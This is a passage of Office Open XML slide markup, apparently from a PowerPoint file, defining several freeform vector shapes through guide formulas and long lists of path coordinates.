                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="279"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="284" y="305"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="284" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="284" y="30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2" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6108700" y="5975350"/>
                  <a:ext cx="165100" cy="263525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 127 w 458"/>
                    <a:gd name="T1" fmla="*/ 0 h 731"/>
                    <a:gd name="T2" fmla="*/ 457 w 458"/>
                    <a:gd name="T3" fmla="*/ 661 h 731"/>
                    <a:gd name="T4" fmla="*/ 331 w 458"/>
                    <a:gd name="T5" fmla="*/ 730 h 731"/>
                    <a:gd name="T6" fmla="*/ 0 w 458"/>
                    <a:gd name="T7" fmla="*/ 62 h 731"/>
                    <a:gd name="T8" fmla="*/ 127 w 458"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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8" h="731">
                      <a:moveTo>
                        <a:pt x="127" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="457" y="661"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="0"/>
                      </a:ln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3" name="Freeform 58"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6202363" y="5897563"/>
                  <a:ext cx="287337" cy="282575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 126 w 799"/>
                    <a:gd name="T1" fmla="*/ 288 h 783"/>
                    <a:gd name="T2" fmla="*/ 383 w 799"/>
                    <a:gd name="T3" fmla="*/ 598 h 783"/>
                    <a:gd name="T4" fmla="*/ 383 w 799"/>
                    <a:gd name="T5" fmla="*/ 598 h 783"/>
                    <a:gd name="T6" fmla="*/ 241 w 799"/>
                    <a:gd name="T7" fmla="*/ 220 h 783"/>
                    <a:gd name="T8" fmla="*/ 378 w 799"/>
                    <a:gd name="T9" fmla="*/ 141 h 783"/>
                    <a:gd name="T10" fmla="*/ 640 w 799"/>
                    <a:gd name="T11" fmla="*/ 446 h 783"/>
                    <a:gd name="T12" fmla="*/ 646 w 799"/>
                    <a:gd name="T13" fmla="*/ 446 h 783"/>
                    <a:gd name="T14" fmla="*/ 504 w 799"/>
                    <a:gd name="T15" fmla="*/ 68 h 783"/>
                    <a:gd name="T16" fmla="*/ 619 w 799"/>
                    <a:gd name="T17" fmla="*/ 0 h 783"/>
                    <a:gd name="T18" fmla="*/ 798 w 799"/>
                    <a:gd name="T19" fmla="*/ 541 h 783"/>
                    <a:gd name="T20" fmla="*/ 656 w 799"/>
                    <a:gd name="T21" fmla="*/ 624 h 783"/>
                    <a:gd name="T22" fmla="*/ 394 w 799"/>
                    <a:gd name="T23" fmla="*/ 320 h 783"/>
                    <a:gd name="T24" fmla="*/ 388 w 799"/>
                    <a:gd name="T25" fmla="*/ 320 h 783"/>
                    <a:gd name="T26" fmla="*/ 530 w 799"/>
                    <a:gd name="T27" fmla="*/ 698 h 783"/>
                    <a:gd name="T28" fmla="*/ 388 w 799"/>
                    <a:gd name="T29" fmla="*/ 782 h 783"/>
                    <a:gd name="T30" fmla="*/ 0 w 799"/>
                    <a:gd name="T31" fmla="*/ 362 h 783"/>
                    <a:gd name="T32" fmla="*/ 126 w 799"/>
                    <a:gd name="T33" fmla="*/ 288 h 7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799" h="783">
                      <a:moveTo>
                        <a:pt x="126" y="288"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="141"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="646" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="798" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="624"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="782"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="288"/>
                      </a:ln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4" name="Freeform 59"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6457950" y="5819775"/>
                  <a:ext cx="219075" cy="220663"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 609"/>
                    <a:gd name="T1" fmla="*/ 310 h 611"/>
                    <a:gd name="T2" fmla="*/ 5 w 609"/>
                    <a:gd name="T3" fmla="*/ 236 h 611"/>
                    <a:gd name="T4" fmla="*/ 0 w 609"/>
                    <a:gd name="T5" fmla="*/ 199 h 611"/>
                    <a:gd name="T6" fmla="*/ 10 w 609"/>
                    <a:gd name="T7" fmla="*/ 169 h 611"/>
                    <a:gd name="T8" fmla="*/ 41 w 609"/>
                    <a:gd name="T9" fmla="*/ 110 h 611"/>
                    <a:gd name="T10" fmla="*/ 67 w 609"/>
                    <a:gd name="T11" fmla="*/ 84 h 611"/>
                    <a:gd name="T12" fmla="*/ 99 w 609"/>
                    <a:gd name="T13" fmla="*/ 58 h 611"/>
                    <a:gd name="T14" fmla="*/ 194 w 609"/>
                    <a:gd name="T15" fmla="*/ 5 h 611"/>
                    <a:gd name="T16" fmla="*/ 231 w 609"/>
                    <a:gd name="T17" fmla="*/ 0 h 611"/>
                    <a:gd name="T18" fmla="*/ 262 w 609"/>
                    <a:gd name="T19" fmla="*/ 0 h 611"/>
                    <a:gd name="T20" fmla="*/ 320 w 609"/>
                    <a:gd name="T21" fmla="*/ 26 h 611"/>
                    <a:gd name="T22" fmla="*/ 341 w 609"/>
                    <a:gd name="T23" fmla="*/ 52 h 611"/>
                    <a:gd name="T24" fmla="*/ 535 w 609"/>
                    <a:gd name="T25" fmla="*/ 320 h 611"/>
                    <a:gd name="T26" fmla="*/ 572 w 609"/>
                    <a:gd name="T27" fmla="*/ 368 h 611"/>
                    <a:gd name="T28" fmla="*/ 608 w 609"/>
                    <a:gd name="T29" fmla="*/ 399 h 611"/>
                    <a:gd name="T30" fmla="*/ 498 w 609"/>
                    <a:gd name="T31" fmla="*/ 478 h 611"/>
                    <a:gd name="T32" fmla="*/ 472 w 609"/>
                    <a:gd name="T33" fmla="*/ 463 h 611"/>
                    <a:gd name="T34" fmla="*/ 446 w 609"/>
                    <a:gd name="T35" fmla="*/ 441 h 611"/>
                    <a:gd name="T36" fmla="*/ 446 w 609"/>
                    <a:gd name="T37" fmla="*/ 489 h 611"/>
                    <a:gd name="T38" fmla="*/ 435 w 609"/>
                    <a:gd name="T39" fmla="*/ 520 h 611"/>
                    <a:gd name="T40" fmla="*/ 409 w 609"/>
                    <a:gd name="T41" fmla="*/ 552 h 611"/>
                    <a:gd name="T42" fmla="*/ 372 w 609"/>
                    <a:gd name="T43" fmla="*/ 583 h 611"/>
                    <a:gd name="T44" fmla="*/ 314 w 609"/>
                    <a:gd name="T45" fmla="*/ 610 h 611"/>
                    <a:gd name="T46" fmla="*/ 283 w 609"/>
                    <a:gd name="T47" fmla="*/ 610 h 611"/>
                    <a:gd name="T48" fmla="*/ 257 w 609"/>
                    <a:gd name="T49" fmla="*/ 604 h 611"/>
                    <a:gd name="T50" fmla="*/ 210 w 609"/>
                    <a:gd name="T51" fmla="*/ 573 h 611"/>
                    <a:gd name="T52" fmla="*/ 188 w 609"/>
                    <a:gd name="T53" fmla="*/ 552 h 611"/>
                    <a:gd name="T54" fmla="*/ 173 w 609"/>
                    <a:gd name="T55" fmla="*/ 530 h 611"/>
                    <a:gd name="T56" fmla="*/ 141 w 609"/>
                    <a:gd name="T57" fmla="*/ 473 h 611"/>
                    <a:gd name="T58" fmla="*/ 131 w 609"/>
                    <a:gd name="T59" fmla="*/ 441 h 611"/>
                    <a:gd name="T60" fmla="*/ 131 w 609"/>
                    <a:gd name="T61" fmla="*/ 415 h 611"/>
                    <a:gd name="T62" fmla="*/ 147 w 609"/>
                    <a:gd name="T63" fmla="*/ 363 h 611"/>
                    <a:gd name="T64" fmla="*/ 162 w 609"/>
                    <a:gd name="T65" fmla="*/ 336 h 611"/>
                    <a:gd name="T66" fmla="*/ 241 w 609"/>
                    <a:gd name="T67" fmla="*/ 242 h 611"/>
                    <a:gd name="T68" fmla="*/ 257 w 609"/>
                    <a:gd name="T69" fmla="*/ 216 h 611"/>
                    <a:gd name="T70" fmla="*/ 262 w 609"/>
                    <a:gd name="T71" fmla="*/ 199 h 611"/>
                    <a:gd name="T72" fmla="*/ 246 w 609"/>
                    <a:gd name="T73" fmla="*/ 158 h 611"/>
                    <a:gd name="T74" fmla="*/ 231 w 609"/>
                    <a:gd name="T75" fmla="*/ 132 h 611"/>
                    <a:gd name="T76" fmla="*/ 210 w 609"/>
                    <a:gd name="T77" fmla="*/ 121 h 611"/>
                    <a:gd name="T78" fmla="*/ 184 w 609"/>
                    <a:gd name="T79" fmla="*/ 121 h 611"/>
                    <a:gd name="T80" fmla="*/ 157 w 609"/>
                    <a:gd name="T81" fmla="*/ 137 h 611"/>
                    <a:gd name="T82" fmla="*/ 126 w 609"/>
                    <a:gd name="T83" fmla="*/ 169 h 611"/>
                    <a:gd name="T84" fmla="*/ 126 w 609"/>
                    <a:gd name="T85" fmla="*/ 184 h 611"/>
                    <a:gd name="T86" fmla="*/ 141 w 609"/>
                    <a:gd name="T87" fmla="*/ 236 h 611"/>
                    <a:gd name="T88" fmla="*/ 47 w 609"/>
                    <a:gd name="T89" fmla="*/ 320 h 611"/>
                    <a:gd name="T90" fmla="*/ 309 w 609"/>
                    <a:gd name="T91" fmla="*/ 294 h 611"/>
                    <a:gd name="T92" fmla="*/ 288 w 609"/>
                    <a:gd name="T93" fmla="*/ 320 h 611"/>
                    <a:gd name="T94" fmla="*/ 267 w 609"/>
                    <a:gd name="T95" fmla="*/ 352 h 611"/>
                    <a:gd name="T96" fmla="*/ 257 w 609"/>
                    <a:gd name="T97" fmla="*/ 378 h 611"/>
                    <a:gd name="T98" fmla="*/ 273 w 609"/>
                    <a:gd name="T99" fmla="*/ 441 h 611"/>
                    <a:gd name="T100" fmla="*/ 294 w 609"/>
                    <a:gd name="T101" fmla="*/ 463 h 611"/>
                    <a:gd name="T102" fmla="*/ 314 w 609"/>
                    <a:gd name="T103" fmla="*/ 478 h 611"/>
                    <a:gd name="T104" fmla="*/ 341 w 609"/>
                    <a:gd name="T105" fmla="*/ 483 h 611"/>
                    <a:gd name="T106" fmla="*/ 362 w 609"/>
                    <a:gd name="T107" fmla="*/ 473 h 611"/>
                    <a:gd name="T108" fmla="*/ 388 w 609"/>
                    <a:gd name="T109" fmla="*/ 452 h 611"/>
                    <a:gd name="T110" fmla="*/ 398 w 609"/>
                    <a:gd name="T111" fmla="*/ 420 h 611"/>
                    <a:gd name="T112" fmla="*/ 404 w 609"/>
                    <a:gd name="T113" fmla="*/ 405 h 611"/>
                    <a:gd name="T114" fmla="*/ 404 w 609"/>
                    <a:gd name="T115" fmla="*/ 389 h 611"/>
                    <a:gd name="T116" fmla="*/ 388 w 609"/>
                    <a:gd name="T117" fmla="*/ 352 h 611"/>
                    <a:gd name="T118" fmla="*/ 320 w 609"/>
                    <a:gd name="T119" fmla="*/ 258 h 6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609" h="611">
                      <a:moveTo>
                        <a:pt x="37" y="310"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="67" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="608" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="162" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="309" y="294"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="309" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="267" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="330" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="351" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="29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5" name="Freeform 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6584950" y="5710238"/>
                  <a:ext cx="166688" cy="227012"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 105 w 463"/>
                    <a:gd name="T1" fmla="*/ 110 h 631"/>
                    <a:gd name="T2" fmla="*/ 153 w 463"/>
                    <a:gd name="T3" fmla="*/ 168 h 631"/>
                    <a:gd name="T4" fmla="*/ 158 w 463"/>
                    <a:gd name="T5" fmla="*/ 168 h 631"/>
                    <a:gd name="T6" fmla="*/ 158 w 463"/>
                    <a:gd name="T7" fmla="*/ 168 h 631"/>
                    <a:gd name="T8" fmla="*/ 153 w 463"/>
                    <a:gd name="T9" fmla="*/ 120 h 631"/>
                    <a:gd name="T10" fmla="*/ 158 w 463"/>
                    <a:gd name="T11" fmla="*/ 84 h 631"/>
                    <a:gd name="T12" fmla="*/ 158 w 463"/>
                    <a:gd name="T13" fmla="*/ 84 h 631"/>
                    <a:gd name="T14" fmla="*/ 163 w 463"/>
                    <a:gd name="T15" fmla="*/ 62 h 631"/>
                    <a:gd name="T16" fmla="*/ 174 w 463"/>
                    <a:gd name="T17" fmla="*/ 47 h 631"/>
                    <a:gd name="T18" fmla="*/ 184 w 463"/>
                    <a:gd name="T19" fmla="*/ 32 h 631"/>
                    <a:gd name="T20" fmla="*/ 200 w 463"/>
                    <a:gd name="T21" fmla="*/ 15 h 631"/>
                    <a:gd name="T22" fmla="*/ 200 w 463"/>
                    <a:gd name="T23" fmla="*/ 15 h 631"/>
                    <a:gd name="T24" fmla="*/ 210 w 463"/>
                    <a:gd name="T25" fmla="*/ 10 h 631"/>
                    <a:gd name="T26" fmla="*/ 210 w 463"/>
                    <a:gd name="T27" fmla="*/ 10 h 631"/>
                    <a:gd name="T28" fmla="*/ 221 w 463"/>
                    <a:gd name="T29" fmla="*/ 0 h 631"/>
                    <a:gd name="T30" fmla="*/ 310 w 463"/>
                    <a:gd name="T31" fmla="*/ 110 h 631"/>
                    <a:gd name="T32" fmla="*/ 310 w 463"/>
                    <a:gd name="T33" fmla="*/ 110 h 631"/>
                    <a:gd name="T34" fmla="*/ 289 w 463"/>
                    <a:gd name="T35" fmla="*/ 120 h 631"/>
                    <a:gd name="T36" fmla="*/ 289 w 463"/>
                    <a:gd name="T37" fmla="*/ 120 h 631"/>
                    <a:gd name="T38" fmla="*/ 273 w 463"/>
                    <a:gd name="T39" fmla="*/ 136 h 631"/>
                    <a:gd name="T40" fmla="*/ 273 w 463"/>
                    <a:gd name="T41" fmla="*/ 136 h 631"/>
                    <a:gd name="T42" fmla="*/ 247 w 463"/>
                    <a:gd name="T43" fmla="*/ 162 h 631"/>
                    <a:gd name="T44" fmla="*/ 247 w 463"/>
                    <a:gd name="T45" fmla="*/ 162 h 631"/>
                    <a:gd name="T46" fmla="*/ 237 w 463"/>
                    <a:gd name="T47" fmla="*/ 179 h 631"/>
                    <a:gd name="T48" fmla="*/ 231 w 463"/>
                    <a:gd name="T49" fmla="*/ 199 h 631"/>
                    <a:gd name="T50" fmla="*/ 231 w 463"/>
                    <a:gd name="T51" fmla="*/ 199 h 631"/>
                    <a:gd name="T52" fmla="*/ 226 w 463"/>
                    <a:gd name="T53" fmla="*/ 215 h 631"/>
                    <a:gd name="T54" fmla="*/ 231 w 463"/>
                    <a:gd name="T55" fmla="*/ 236 h 631"/>
